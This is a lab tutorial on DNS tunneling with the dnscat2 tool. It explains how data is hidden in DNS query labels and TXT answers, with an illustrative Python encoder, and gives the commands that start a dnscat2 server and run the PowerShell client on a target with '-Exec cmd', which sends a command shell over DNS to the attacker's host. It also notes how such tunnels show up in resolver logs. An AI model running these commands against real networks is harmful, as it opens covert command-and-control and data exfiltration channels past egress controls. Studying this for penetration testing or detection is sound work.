
DNS Tunneling with Dnscat2

  • dnscat2 is a tunneling tool that uses the DNS protocol to send data between two hosts.
  • It uses an encrypted Command & Control (C2) channel and carries the data inside DNS records (TXT records in particular), so the traffic looks like ordinary name resolution.
  • Every Active Directory environment has its own DNS server, which resolves internal names and forwards everything else to upstream (external) DNS servers.
  • With dnscat2, the client requests resolution of names under a domain the attacker controls, so the local DNS server forwards those queries to the attacker's external server; the data travels inside the queries and answers themselves rather than in a legitimate DNS request.
  • https://github.com/iagox86/dnscat2.git
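
As an added illustration (not dnscat2's own code or wire format), the Python below shows the mechanism the bullets describe: outbound data is hex-packed into the labels of a name under the attacker's domain and looked up as a DNS query, and inbound data comes back in the TXT answer. The RFC 1035 limits (63-octet labels, 253-character names, 255-octet TXT strings) are real; the framing around them (a 16-bit sequence label, hex encoding, no session id or encryption) is a toy of this example. The domain inlanefreight.local and the sample payloads are assumed for the lab.

```python
from __future__ import annotations

import binascii

# RFC 1035 limits that any DNS tunnel has to live within (these are real limits;
# the framing around them is a toy of this example, not dnscat2's own format).
MAX_LABEL = 63        # one label is at most 63 octets
MAX_NAME = 253        # a full name in text form is at most 253 characters
MAX_TXT_STRING = 255  # each <character-string> inside TXT RDATA is at most 255 octets


def encode_query(chunk: bytes, domain: str, seq: int) -> str:
    """Client -> server: hide one chunk in the labels of a name under `domain`.

    The returned name is what the client looks up (dnscat2 asks for TXT by default).
    `seq` (16 bits here) lets the server reorder chunks that arrive out of order.
    """
    hexdata = binascii.hexlify(chunk).decode()
    labels = [hexdata[i:i + MAX_LABEL] for i in range(0, len(hexdata), MAX_LABEL)]
    name = ".".join([f"{seq & 0xFFFF:04x}"] + labels + [domain])
    if len(name) > MAX_NAME:
        raise ValueError(f"name too long ({len(name)} > {MAX_NAME} chars)")
    return name


def decode_query(name: str, domain: str) -> tuple[int, bytes]:
    """Server side: recover (seq, chunk) from a query name under `domain`."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("query is not for the tunnel domain")
    labels = name[:-len(suffix)].split(".")
    return int(labels[0], 16), binascii.unhexlify("".join(labels[1:]))


def chunk_size(domain: str) -> int:
    """Largest number of raw bytes that fit in one query name under `domain`."""
    n = 0
    while True:
        try:
            encode_query(b"\x00" * (n + 1), domain, 0xFFFF)
        except ValueError:
            return n
        n += 1


def tunnel_send(payload: bytes, domain: str) -> list[str]:
    """Split a payload into the sequence of query names a client would issue."""
    size = chunk_size(domain)
    return [encode_query(payload[i:i + size], domain, seq)
            for seq, i in enumerate(range(0, len(payload), size))]


def tunnel_receive(names, domain: str) -> bytes:
    """Reassemble the payload from query names, whatever order they arrived in."""
    chunks = sorted(decode_query(n, domain) for n in names)
    return b"".join(data for _, data in chunks)


def encode_txt(data: bytes) -> list[bytes]:
    """Server -> client: split response data into TXT character-strings."""
    hexdata = binascii.hexlify(data)
    return [hexdata[i:i + MAX_TXT_STRING] for i in range(0, len(hexdata), MAX_TXT_STRING)]


def decode_txt(strings) -> bytes:
    """Client side: join the TXT strings back into the response bytes."""
    return binascii.unhexlify(b"".join(strings))


if __name__ == "__main__":
    domain = "inlanefreight.local"
    # Constructed sample: command output leaving the host, and a command coming back.
    outbound = b"Windows IP Configuration\r\n" * 160   # roughly 4 KB of ipconfig-like output
    names = tunnel_send(outbound, domain)
    print(f"{len(outbound)} bytes -> {len(names)} queries, e.g. {names[0]}")
    assert tunnel_receive(reversed(names), domain) == outbound
    reply = decode_txt(encode_txt(b"whoami /all\r\n"))
    print("TXT answer carries:", reply)
```

Two things worth noticing: under a 19-character domain only about 112 bytes fit in one query, so a few kilobytes of command output cost dozens of queries to the same domain with long, high-entropy labels, which is why DNS tunnels are slow and why resolver logs make them stand out; and every query has to be forwarded to the server that knows the domain, which is the step that lets dnscat2 cross a network boundary where only DNS is allowed out. Real dnscat2 adds a session id, sequence/acknowledgement numbers and encryption keyed by the pre-shared secret on top of this basic idea.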

Workflow:

Set up dnscat2

    git clone https://github.com/iagox86/dnscat2.git

    cd dnscat2/server/
    sudo gem install bundler
    sudo bundle install

Starting the dnscat2 server:

    sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

On startup the server prints a secret key. We have to give the same key to the dnscat2 client; it authenticates the client and encrypts the data sent to our external dnscat2 server. Binding port 53 needs root, hence sudo. In this lab the client is pointed straight at our host (-DNSserver below); in a real network where the target can only reach its own resolver, the domain has to be delegated (NS record) to the dnscat2 server so the resolver forwards the tunnel queries to it.

dnscat2 on the target

We can use the client in the dnscat2 client folder or the dnscat2-powershell client. Send the dnscat2.ps1 file to the target host, then run:

    Import-Module .\dnscat2.ps1
    Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

This builds the tunnel to the server on PWNBox and sends a cmd shell over it. -PreSharedSecret is the secret key printed by the server, and the -Domain value must match the domain= given to the server.

Interacting with the session

After the above command, the server reports a new session and drops us at the dnscat2> prompt. To get the cmd shell, attach to that session's window:

    window -i 1

Use the window ID the server listed for the session (1 for the first session).